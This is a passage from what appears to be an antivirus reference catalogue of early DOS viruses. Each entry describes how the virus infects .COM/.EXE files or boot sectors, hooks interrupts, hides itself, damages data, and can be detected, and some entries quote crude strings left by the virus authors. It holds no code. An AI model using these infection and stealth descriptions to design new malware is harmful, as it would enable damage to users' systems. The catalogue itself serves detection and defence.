Description: Infects *.COM files, including COMMAND.COM.
When an infected file is executed, the virus will attempt to infect
three *.COM files starting from C:\. Infected files will increase
in size by 743 bytes with the virus being located at the beginning
of the file.
The virus is activated on the 8th of any month when it will overwrite
the FAT table and root directory.
[Telecom]
Virus Name: Telecom
Alias Name: Telefonica
Virus Type: File Virus
Virus Length: 3,700 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 3,984 bytes.
Once the virus is memory resident, it will infect *.COM files that
are larger than 1,000 bytes when they are executed. Infected files
will increase in size by 3,700 bytes. Date and time information
of infected files will be altered with 100 being added to the year.
[Tequila]
Virus Name: Tequila
Alias Name: Stealth
Virus Type: File Virus
Virus Length: 2,468 bytes
Description: Infects *.EXE files as well as boot sectors.
PC Vectors Hooked: INT 13h, INT 21h
Infection method: The first time an infected file runs, the virus
infects the master boot record. When the system is booted from the
infected hard disk, the virus loads itself in memory. While loaded,
it infects any .EXE file that executes. The DOS CHKDSK program will
show a "total bytes memory" decrease of 3,072 bytes. Infected .EXE
files increase by 2,468 bytes. The virus won't infect files starting
with "V" or "SC."
Damage: Several months after the initial infection, the virus becomes
active. Each month afterward, if an infected program is run on the
same day of the first infection, a graphic and this message will be
displayed.
Welcome to T.TEQUILA'S latest production.
Contact T.TEQUILA/P.o.Box 543/6312
St'hausen/Switzerland
Loving thoughts to L.I.N.D.A
BEER and TEQUILA forever !
Note: The virus hides the infected partition record and increases
the size of infected files.
[Traveller]
Virus Name: Traveller
Alias Name: Bupt
Virus Type: File Virus
Virus Length: 1,220 to 1,237 bytes
Description: Infects *.COM and *.EXE files, as well as COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decreased by 1,840 bytes.
Once the virus is memory resident, it will infect *.COM and *.EXE
files when they are executed. This virus will also infect when the
DIR command is used. Infected files will increase in size by
1,220 to 1,237 bytes, with the virus being located at the end of
the infected file. Date and time information of infected files
will not be altered.
The following text string can be found in the virus:
"Traveller (C) BUPT 1991.4"
"Don't panic I'm harmless <<---!!!!!!!"
"*.* COMEXE"
[Trivial]
Virus Name: Trivial
Alias Name: Minimal, Mini-45
Virus Type: File Virus
Virus Length: 45 bytes
Description: Infects *.COM files, as well as COMMAND.COM.
When an infected file is executed, the virus will infect all *.COM
files in same directory. The first 45 bytes of infected files will
be overwritten by the virus. The date and time information of
infected files will be updated to the time of infection.
All infected files will be permanently corrupted.
[V-sign]
Virus Name: V-sign
Alias Name: Cansu, Sigalet, Sigalit
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects floppy boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When an infected disk is booted, the virus loads
itself in memory. While loaded, it infects any accessed disk. The
DOS CHKDSK program will show a "total bytes memory" decrease of 2 KB.
Damage: After infecting 64 disks, the virus displays a large V and
hangs the machine.
[V2P6]
Virus Name: V2P6
Alias Name:
Virus Type: File Virus
Virus Length: 1,946 to 2,111 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus will infect the first
uninfected *.COM file in the same directory. Infected files will
experience a file length increase of 1,946 to 2,111 bytes with the
virus being located at the end of the file.
[Vacsina]
Virus Name: Vacsina
Alias Name: Vacsina.TP-05.A, TP family
Virus Type: File Virus
Virus Length: 1,206 bytes
Description: This virus infects *.COM and *.EXE files.
Infection method: When an infected file runs, the virus loads itself
in memory. While loaded, it infects any file that executes. Before
infecting .EXE files, the virus converts them to a .COM file
format.
Damage: None known
Note: There are many known variants of the Vacsina virus. The Vacsina
family of viruses is also known as the "T.P." family.
[VCL]
Virus Name: VCL
Alias Name: Code Zero
Virus Type: File Virus
Virus Length: 576 bytes
Description: Infects *.COM files, as well as COMMAND.COM.
When an infected file is executed, the virus will search the same
directory for an uninfected *.COM file. Infected files will experience
a file length increase of 576 bytes with the virus being located
at the end of the file. If no uninfected files are found, the
following message is displayed:
"** CODE ZERO **"
Date and time information of infected files will not be altered.
The following text string can be found in the virus:
"*.* *.COM"
"** CODE ZERO **"
"Code Zero Virus"
"1992 Nowhere Man/[NukE]"
[Vengence]
Virus Name: Vengence
Alias Name: Parasite, Vengeance
Virus Type: File Virus
Virus Length: 723 bytes
Description: Infects *.COM files, as well as COMMAND.COM.
When an infected file is executed, the virus will infect the first
uninfected *.COM file in the same directory. Infected files will
experience a file length increase of 723 bytes with the virus
being located at the end of the file. Date and time
information of infected files will be altered to show 56 in the
seconds field.
The following text string can be found in the virus:
"*** Vengeance is ours! ***"
"SKISM/Phalcon '92"
"PATH=*.COM"
"????????COM"
[Vienna]
Virus Name: Vienna
Alias Name: DOS-62, Unesco, Austrian, 648, PC Boot
Virus Type: File Virus
Virus Length: 648 bytes
Description: This virus infects *.COM files.
Symptoms: Increases infected file sizes by 648 bytes and files
containing string "*.COM" and "PATH=". Destroyed programs will
cause computer to reboot while in operation.
Damage: With the probability of 1:7 the virus will not infect
other files. Virus writes the instruction JMP F000:FFF0 (computer
reboot) at the start of such a program. Original content is
destroyed, length of file is not changed, and destroyed program
contains virus flag.
[XPEH]
Virus Name: XPEH
Alias Name: 4-B, Yankee Doodle.XPEH.4928, Micropox
Virus Type: File Virus
Virus Length: 4,016 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 1Ch, INT 21h
Infection method: When an infected file runs, the virus loads itself
in memory. While loaded, it infects any accessed executable files.
The DOS CHKDSK program will show a "total bytes memory" decrease of
4032 bytes. Infected files increase by 4016 bytes.
Damage: Under analysis
[Yank-D.TP.44.A]
Virus Name: Yank-D.TP.44.A
Alias Name: Yankee Doodle, TP44
Virus Type: File Virus
Virus Length: 2,899 bytes
Description: This virus infects *.COM and *.EXE files.
When an infected file is executed, the virus installs itself into
memory. Once the virus is memory resident, it plays the song "Yankee
Doodle" on the computer speaker everyday at 5 p.m.
Infected files will experience a file length increase of 2,899 bytes.
[Simple]
Virus Name: Simple cd
Virus Type: File Virus (infects .COM files only.)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure: Searches for .COM files in the current directory.
When it finds a .COM file it checks whether it has been previously
infected by the SIMPLE virus. If "YES" it continues to look
for uninfected .COM files. It then infects the file and looks for the
next COM file until all the .COM files in the current directory are
infected.
Damage: Overwrites the original file, so the length of the original
file won't reflect any increase. Note: Doesn't stay resident in
memory. SIMPLE doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error present (such as write
protect).
[Alien-1]
Virus Name: Alien-1
Virus Type: File Virus (infects .COM and .EXE files.)
Virus Length: 571 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h
Execution Procedure: Checks whether it has been loaded resident in
high memory. If "No", then it loads itself resident into memory
(highest memory) by hooking INT 21, then it executes the
originally called file; if "Yes", then it directly executes
the originally called file.
Damage: None
Characteristics:
1) The virus infects files by hooking INT 21h(AX=4B), when an
uninfected file is executed, the file will be infected.
2) Alien-1 doesn't hook INT 24h when infecting files. Error
messages occur if there is an I/O error (such as write protect).
Detection Method: Infected files will increase by 571 bytes.
[Lep-0736]
Virus Name: Lep-0736
Virus Type: File Virus (infects .COM and .EXE files.)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for .COM and .EXE files in current directory.
2) Checks whether the files found have been infected by LEP-0736.
If "Yes", continue to look for an uninfected COM and EXE files.
3) Infects the uninfected file (infects only four files at a time).
Then the following message appears on the screen: "Program too
big to fit in memory"
Damage: Overwrites the original file, so the length of the file won't
increase.
Detection Method: Check for the error message: "Program too big to
fit in memory."
Note:
1) Doesn't stay resident in memory.
2) LEP-0736 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Ice-199]
Virus Name: Ice-199
Virus Type: File Virus (infects .COM files only.)
Virus Length: 199 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by Ice-199. If "Yes",
continues to look for an uninfected .COM file.
3) Infects only one file at a time.
Damage: None
Detection Method: Infected files will increase length by 199 bytes.
Note:
1) Doesn't stay resident in memory.
2) ICE-199 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Made-255]
Virus Name: Made-255
Virus Type: File Virus (infects .COM files.)
Virus Length: 255 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by Made-255. If "Yes",
it continues to look for an uninfected .COM file.
3) Infects only one file at a time.
Damage: None
Detection Method: Infected files will increase by 255 bytes.
Note:
1) After an infected file is executed, the system will halt.
2) Doesn't stay resident in memory.
3) MADE-255 doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[2570]
Virus Name: 2570
Virus Type: File Virus (infects .COM files only)
Virus Length: 2570 Bytes
PC Vectors Hooked: None
Execution Procedure: Searches for a .COM file in the current directory.
Checks first to verify if the file has been previously infected by 2570.
If "Yes", continues to look for an uninfected .COM file. Infects only
one .COM file at a time. After infection, information such as those
listed below will appear on the infected computer screen:
a) Cycle sluts from hell..
b) Virus Mania IV..
c) 2 Live Crew is fucking cool..
d) Like Commentator I, HIP-HOP sucks..
e) dr. Ruth is a first-class lady!..
f) Don t be a wimp, Be dead!.. and so on. Then the
originally called program will be executed.
Damage: None
Detection Method: Infected files will increase by 2570 bytes.
Note: Doesn't stay resident in memory. 2570 doesn't hook INT 24h
when infecting files. Error message appears if there is an I/O error
(such as write protect).
[Ice-250]
Virus Name: Ice-250
Virus Type: File Virus (infects .COM files)
Virus Length: 250 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by Ice-250. If "Yes", it
continues to look for an uninfected .COM file.
3) It infects only one file at a time.
Damage: None
Detection Method: Infected files will increase by 250 bytes.
Note:
1) Doesn't stay resident in memory.
2) ICE-250 doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[Ice-224]
Virus Name: Ice-224
Virus Type: Virus Infector (infects .COM files)
Virus Length: 224 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by Ice-224. If "Yes",
it continues to look for an uninfected .COM file.
3) Infects only one file at a time.
Damage: None
Detection Method: Infected files will increase by 224 bytes.
Note:
1) Doesn't stay resident in memory.
2) ICE-224 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Lct-762]
Virus Name: Lct-762
Virus Type: File Virus (infects .COM files)
Virus Length: 762 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by LCT-762. If "Yes",
continues to look for an uninfected .COM file.
3) Infects uninfected files until all .COM files in the directory
have been infected.
Damage: None
Detection Method: Infected files will increase by 762 bytes.
Note:
1) Doesn't stay resident in memory.
2) LCT-762 doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Alien-3]
Virus Name: Alien-3
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 625 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it has been loaded resident in high memory.
If "No", then it loads itself resident into memory (highest
memory portion) by hooking INT 21h.
2) The virus will then check the system time; if the number of
minutes passed in the hour are between 33 to 60, it will display
" " parentheses on the screen.
3) After infection it will then execute the original file.
Damage: None
Characteristics:
1) The virus infects files by hooking INT 21h (AX=4B), when an
uninfected file is executed, the file will be infected.
2) Alien-3 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
Detection Method: Infected files will increase by 625 Bytes.
[Lep-562]
Virus Name: Lep-562
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) It first searches for a .COM or .EXE file in the current directory.
2) It checks whether it has been infected by LEP-562. If "Yes", it
continues to look for uninfected .COM and .EXE files.
3) If "No" it will infect the uninfected files (infecting only four
files at a time). When you execute the file the following message
appears on the screen:
"Program too big to fit in memory."
Damage: Overwrites the original file, so the length of the file won't
increase.
Detection Method: Check for the message: "Program too big to fit in
memory" on the screen.
Note:
1) Doesn't stay resident in memory.
2) LEP-562 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Navi-282]
Virus Name: Navi-282
Virus Type: File Virus (infects .COM files only)
Virus Length: 282 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by NAVI-282. If "Yes", it
continues to look for any uninfected .COM files.
3) Infects only one file at a time.
Damage: None
Detection Method: Infected files will increase by 282 bytes.
Note:
1) Doesn't stay resident in memory.
2) NAVI-282 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Minimite]
Virus Name: Minimite
Virus Type: File Virus (infects .COM files)
Virus Length: 183 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks whether it has been infected by Minimite. If "Yes", it
continues to look for any uninfected .COM files.
3) It then continues to infect files until all .COM files in the
directory have been infected.
Damage: None
Detection Method: Infected files will increase by 183 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Minimite doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Spanz]
Virus Name: Spanz
Virus Type: File Virus (infects .COM files)
Virus Length: 639 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It then checks the date of the .COM file.
3) Checks whether it has been infected by Spanz. If "Yes", continues
to look for any uninfected .COM files.
3) Infects only one file at a time.
Damage: None
Detection Method: Infected files will increase by 639 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Spanz doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Wilbur]
Virus Name: Wilbur
Virus Type: File Virus (infects .COM files)
Virus Length: 512 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It then checks whether it has been infected by Wilbur. If "Yes",
it continues to look for any uninfected .COM files.
3) It infects only one file at a time.
4) After infection it executes the originally called file.
Damage: None
Detection Method: Infected files will increase by 512 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Wilbur doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Repent]
Virus Name: Repent
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It then checks whether it has been infected by Repent. If "Yes",
it continues to look for any uninfected .COM files.
3) It infects only three files at a time.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) Repent doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Twin-Peak]
Virus Name: Twin-Peak
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Checks to see whether it has been infected by TWIN-PEAK. If "Yes",
it continues to look for any uninfected .COM file.
3) It only infects one file at a time.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) TWIN-PEAK doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[Pa-5792]
Virus Name: Pa-5792
Virus Type: File Virus (infects .EXE files)
Virus Length: 5792 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an .EXE file in the current directory and the "A:"
drive.
2) It then checks whether it has been infected by PA-5792. If "Yes",
it continues to look for any uninfected .EXE file.
3) It only infects seven files at a time.
4) It executes the originally called file.
Damage: None
Detection Method: Infected files will increase by 5792 Bytes.
Note:
1) Doesn't stay resident in memory.
2) PA-5792 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Les]
Virus Name: Les
Virus Type: File Virus (infects .EXE files)
Virus Length: 358 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an .EXE file in the current directory.
2) It then checks to see whether it has been infected by the LES
virus. If "Yes", it continues to look for any uninfected
.EXE file.
3) It finally infects all .EXE files in the directory.
Damage: None
Detection Method: Infected files will increase by 358 Bytes.
Note:
1) Doesn't stay resident in memory.
2) LES doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[H & P]
Virus Name: H&P
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) It then checks whether it has been infected by H&P. If "Yes",
it continues to look for any uninfected .COM files.
3) It only infects one file at a time.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) H&P doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[OW]
Virus Name: Ow
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) It then checks to see whether it has been already infected by OW.
If "Yes", it continues to look for any uninfected .COM file.
3) It finally infects all files in the directory.
Damage: Overwrites original files, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) OW doesn't hook INT 24h when infecting files. Error message appears
if there is an I/O error (such as write protect).
[Small115]
Virus Name: Small115
Virus Type: File Virus (infects .COM files)
Virus Length: 115 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It then checks whether it has been infected by Small115. If "Yes",
it continues to look for any uninfected .COM file.
3) It finally infects all the .COM files in the directory.
Damage: Infected files won't be able to execute.
Detection Method: Infected files will increase by 115 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Small115 doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error of (such as write protect).
[Torm-263]
Virus Name: Torm-263
Virus Type: File Virus (infects .COM files)
Virus Length: 263 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It then checks whether it has been infected by TORM-263. If "Yes",
it continues to look for any uninfected .COM files.
3) It then infects all uninfected files in the directory.
4) Finally, it executes the original file.
Damage: None
Detection Method: Infected files will increase by 263 Bytes.
Note:
1) Doesn't stay resident in memory.
2) TORM-263 doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[Radyum]
Virus Name: Radyum
Virus Type: File Virus (infects .COM files)
Virus Length: 448 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It checks whether it has been infected by Radyum. If "Yes", it
continues to look for any uninfected .COM files.
3) It only infects one file at a time.
4) Finally it executes the original file.
Damage: None
Detection Method: Infected files will increase by 448 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Radyum doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Psycho]
Virus Name: Psycho
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM or .EXE file in the current directory.
2) It checks whether the file has been infected by Psycho. If "Yes",
it continues to search for an uninfected .COM or .EXE file.
3) It then infects all .EXE and .COM files in the directory.
Damage: Overwrites original files, so the length of infected
files won't increase.
Note:
1) Doesn't stay resident in memory.
2) Psycho doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[VCL9]
Virus Name: Vcl9
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for .COM or .EXE files in the current directory.
2) It checks whether the first file found has been infected by VCL9.
If "Yes", it continues to look for any uninfected .COM or .EXE
file.
3) It only infects two files at a time.
Damage: Overwrites original files, so the length of infected files
won't increase.
Note:
1) Doesn't stay resident in memory.
2) VCL9 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Cheesy]
Virus Name: Cheesy
Virus Type: File Virus (infects .EXE files)
Virus Length: 381 Bytes(EXE)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an .EXE file in the current directory.
2) When it locates an .EXE file it checks whether it has been
infected by CHEESY. If "Yes", it continues to look for an
uninfected .EXE file.
3) It then proceeds to infect all the .EXE files in the directory.
4) Once a file is executed the system halts.
Damage: System halts
Detection Method: Infected files will increase by 381 Bytes.
Note:
1) Doesn't stay resident in memory.
2) CHEESY doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Dutch]
Virus Name: Dutch
Virus Type: File Virus (infects .COM files)
Virus Length: 358 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) When it locates a file it checks whether it has been infected by
Dutch. If "Yes", it continues to look for any uninfected .COM
file.
3) It only infects one file at a time.
Damage: None
Detection Method: Infected files will increase by 358 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Dutch doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Mini-2]
Virus Name: Mini-2
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates the first .COM file it checks whether it has
been infected by MINI-2. If "Yes", it continues to look for
any uninfected .COM files.
3) It then infects all .COM files in the directory.
Damage: Overwrites original files, so the length of infected files
won't increase.
Note:
1) Doesn't stay resident in memory.
2) MINI-2 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Define-1]
Virus Name: Define-1
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an .EXE or .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected
by Define-1. If "Yes", it continues to look for another
uninfected .COM or .EXE file.
3) It only infects one file at a time.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) Define-1 doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[205]
Virus Name: 205
Virus Type: File Virus (infects .COM files)
Virus Length: 205 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) When it locates a .COM file it checks if the file has been
previously infected by 205. If "Yes", it continues to look for
an uninfected .COM file.
3) It then proceeds to infect all the .COM files in the directory.
4) Finally it executes the originally called file.
Damage: None
Detection Method: Infected files will increase by 205 Bytes.
Note:
1) Doesn't stay resident in memory.
2) 205 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Banana]
Virus Name: Banana
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) When it locates a .COM file it checks whether or not it has been
infected by Banana. If "Yes", it continues to search for another
uninfected .COM file.
3) It then proceeds to infect all .COM files in the directory.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) Banana doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[334]
Virus Name: 334
Virus Type: File Virus (infects .COM files)
Virus Length: 334 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a .COM file it checks whether it has been
infected by 334. If "Yes", it continues to search for an
uninfected .COM file.
3) It infects uninfected files one at a time.
4) Finally it executes the original file.
Damage: None
Detection Method: Infected files will increase by 334 Bytes.
Note:
1) Doesn't stay resident in memory.
2) 334 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Redx-1]
Virus Name: Redx-1
Virus Type: File Virus (infects .COM files)
Virus Length: 796 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the C:\ root directory.
2) Once it locates a .COM file it checks whether it has been infected
by REDX-1. If "Yes", it continues searching for an uninfected .COM
file.
3) It then infects other .COM files two at a time.
4) It finally executes the original file.
Damage: None
Detection Method: Infected files will increase by 796 Bytes.
Note:
1) Doesn't stay resident in memory.
2) REDX-1 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Dismember]
Virus Name: Dismember
Virus Type: File Virus (infects .COM files)
Virus Length: 288 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a .COM file it checks whether it has been infected
by Dismember. If "Yes", it continues to search for an uninfected
.COM file.
3) It then infects all .COM files in the directory.
4) Finally, it executes the originally called file.
Damage: None
Detection Method: Infected files will increase by 288 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Dismember doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[Timid]
Virus Name: Timid
Virus Type: File Virus (infects .COM files)
Virus Length: 306 Bytes (COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
Timid. If "Yes", it continues to search for an uninfected
.COM file.
3) It then infects one file at a time and displays the infected file
name on the screen.
4) Once the file is executed the system will halt.
Damage: Damages original file.
Detection Method:
1) Infected files will increase by 306 Bytes.
2) Other file names are shown on the screen.
Note:
1) Doesn't stay resident in memory.
2) Timid doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Druid]
Virus Name: Druid
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
Druid. If "Yes", it continues to search for any uninfected
.COM file.
3) It then infects all .COM files in the directory.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) Druid doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Itti-B]
Virus Name: Itti-B
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
ITTI-B. If "Yes", it continues to look for any uninfected
.COM file.
3) It will only infect one file at a time.
4) It finally damages all the data on current disk if none of the
.COM files are infected.
Damage:
1) Overwrites original file, so the length of infected file won't
increase.
2) Damages all data on current disk if none of the .COM files are
infected.
Note:
1) Doesn't stay resident in memory.
2) ITTI-B doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Itti-A]
Virus Name: Itti-A
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a .COM file it checks whether it has been infected
by ITTI-A. If "Yes", it continues to look for any uninfected
.COM file.
3) It infects only one file at a time. Then when the file is executed
the message "EXEC FAILURE" will show on the screen.
4) It will finally damage all data on current disk if no .COM file
is infected.
Damage:
1) Overwrites original file, so the length of infected file won't
increase.
2) Damages all data on current disk if no .COM file is infected.
Note:
1) Doesn't stay resident in memory.
2) ITTI-A doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Burger]
Virus Name: Burger
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a COM file in the current directory.
2) Checks whether it has been infected by Burger. If "Yes", it
continues to look for an uninfected COM file.
3) Infects only one file at a time.
4) Damages all data on current disk if no .COM file is infected.
Damage:
1) Overwrites original file, so the length of infected file won't
increase.
2) Damages all data on current disk if no .COM file is infected.
Note:
1) Doesn't stay resident in memory.
2) Burger doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as writing protect).
[Bloodlust]
Virus Name: Bloodlust
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a *.C* file in the current directory.
2) Once it locates a file it checks whether it has been infected by
Bloodlust. If "Yes", it continues to look for any uninfected
*.C* file.
3) Once it locates an uninfected *.C* file it will infect it and
will continue doing this until all *.C* files are infected.
Damage: Overwrites original file, so the length of infected file
won't increase.
Note:
1) Doesn't stay resident in memory.
2) Bloodlust doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[ZY]
Virus Name: Zy
Virus Type: File Virus (infects .COM files)
Virus Length: 463 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
ZY. If "Yes", it continues to look for any uninfected .COM file.
3) It only infects one file at a time.
4) It finally executes the originally called file.
Damage: None
Detection Method: Infected files will increase by 463 Bytes.
Note:
1) Doesn't stay resident in memory.
2) ZY doesn't hook INT 24h when infecting files. Error message appears
if there is an I/O error (such as write protect).
[Kode4-2]
Virus Name: Kode4-2
Virus Type: File Virus (infects .COM files)
Virus Length: About 3000 Bytes (COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a *.C* file in the current directory.
2) Infects all the *.C* files in the directory.
3) Then the following screen message will appear: "-=+ Kode4 +=-, The
one and ONLY!"
Damage: Overwrites original files.
Detection Method: Check for the message, "-=+ Kode4 +=- The one and
ONLY!" on the screen.
Note:
1) Doesn't stay resident in memory.
2) Kode4-2 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Mini-212]
Virus Name: Mini-212
Virus Type: File Virus (infects .COM files)
Virus Length: 212 or 300 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory beginning with
files starting with the letter "A" and randomly selecting files
through the letter "Z".
2) It then checks the file whether it has been infected by MINI-212.
If "Yes", it continues to look for an uninfected .COM file.
3) It only infects one file at a time.
Damage: None
Detection Method: Infected files will increase by 212 or 300 bytes.
Note:
1) Doesn't stay resident in memory.
2) MINI-212 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Anna]
Virus Name: Anna
Virus Type: File Virus (infects .COM files)
Virus Length: 742 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
ANNA. If "Yes", it continues to look for any uninfected .COM
file.
3) It will only infect one file at a time.
